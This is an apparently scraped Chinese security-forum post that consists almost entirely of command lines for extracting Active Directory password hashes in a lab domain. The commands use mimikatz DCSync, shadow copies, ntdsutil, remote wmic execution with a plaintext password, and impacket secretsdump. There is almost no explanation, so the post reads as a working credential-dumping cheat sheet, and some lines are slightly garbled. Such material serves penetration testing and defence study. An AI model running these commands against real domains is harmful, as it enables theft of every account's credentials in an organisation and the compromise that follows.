855
862
2940
金牌会员
C:\Windows\NTDS\NTDS.dit:
lsadump::dcsync /domain:pentestlab.local /all /csv
lsadump::dcsync /domain:pentestlab.local /user:test
privilege::debug lsadump::lsa /inject
usemodule credentials/mimikatz/dcsync_hashdump
https://github.com/samratashok/nishang
Import-Module .\Copy-VSS.ps1 Copy-VSS Copy-VSS -DestinationDir C:\ShadowCopy\
load powershell powershell_import /root/Copy-VSS.ps1 powershell_execute Copy-VSS
Copy-VSS Copy-VSS -DestinationDir C:\Ninja
Import-Module .\VolumeShadowCopyTools.ps1 New-VolumeShadowCopy -Volume C:\ Get-VolumeShadowCopy
powershell_shell New-VolumeShadowCopy -Volume C:\ Get-VOlumeShadowCopy
https://gist.github.com/monoxgas/9d238accd969550136db
Invoke-DCSync
Invoke-DCSync -PWDumpFormat
ntdsutil activate instance ntds ifm create full C:\ntdsutil quit quit
diskshadow.exe /s c:\diskshadow.txt
diskshadow LIST SHADOWS ALL
reg.exe save hklm\system c:\exfil\system.bak
wmic /node:dc /userENTESTLAB\David /password:pentestlab123!! process call create "cmd /c vssadmin create shadow /for=C: 2>&1"
wmic /node:dc /userENTESTLAB\David /password:pentestlab123!! process call create "cmd /c copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1"
wmic /node:dc /userENTESTLAB\David /password:pentestlab123!! process call create "cmd /c copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM\ C:\temp\SYSTEM.hive 2>&1"
PS C:\Users\test.PENTESTLAB> copy \10.0.0.1\c$\temp\ntds.dit C:\temp PS C:\Users\test.PENTESTLAB> copy \10.0.0.1\c$\temp\SYSTEM.hive C:\temp
vssadmin create shadow /for=C:
copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy
cscript vssown.vbs /start cscript vssown.vbs /create c cscript vssown.vbs /list cscript vssown.vbs /delete
copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy11\windows\ntds\ntds.dit C:\vssown copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy11\windows\system32\config\SYSTEM C:\vssown copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy11\windows\system32\config\SAM C:\vssown
auxiliary/admin/smb/psexec_ntdsgrab
windows/gather/credentials/domain_hashdump
http://www.foofus.net/fizzgig/fgdump/fgdump-2.1.0-exeonly.zip
fgdump.exe
type 127.0.0.1.pwdump
https://github.com/CoreSecurity/impacket
impacket-secretsdump -system /root/SYSTEM -ntds /root/ntds.dit LOCAL
impacket-secretsdump -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc$@10.0.0.1
https://github.com/zcgonvh/NTDSDumpEx
NTDSDumpEx.exe -d ntds.dit -s SYSTEM.hive
https://github.com/LordNem/adXtract
./adXtract.sh /root/ntds.dit /root/SYSTEM pentestlab
使用道具 举报
本版积分规则 发表回复 回帖后跳转到最后一页
小黑屋|安全矩阵
GMT+8, 2024-11-29 13:37 , Processed in 0.013795 second(s), 18 queries .
Powered by Discuz! X4.0
Copyright © 2001-2020, Tencent Cloud.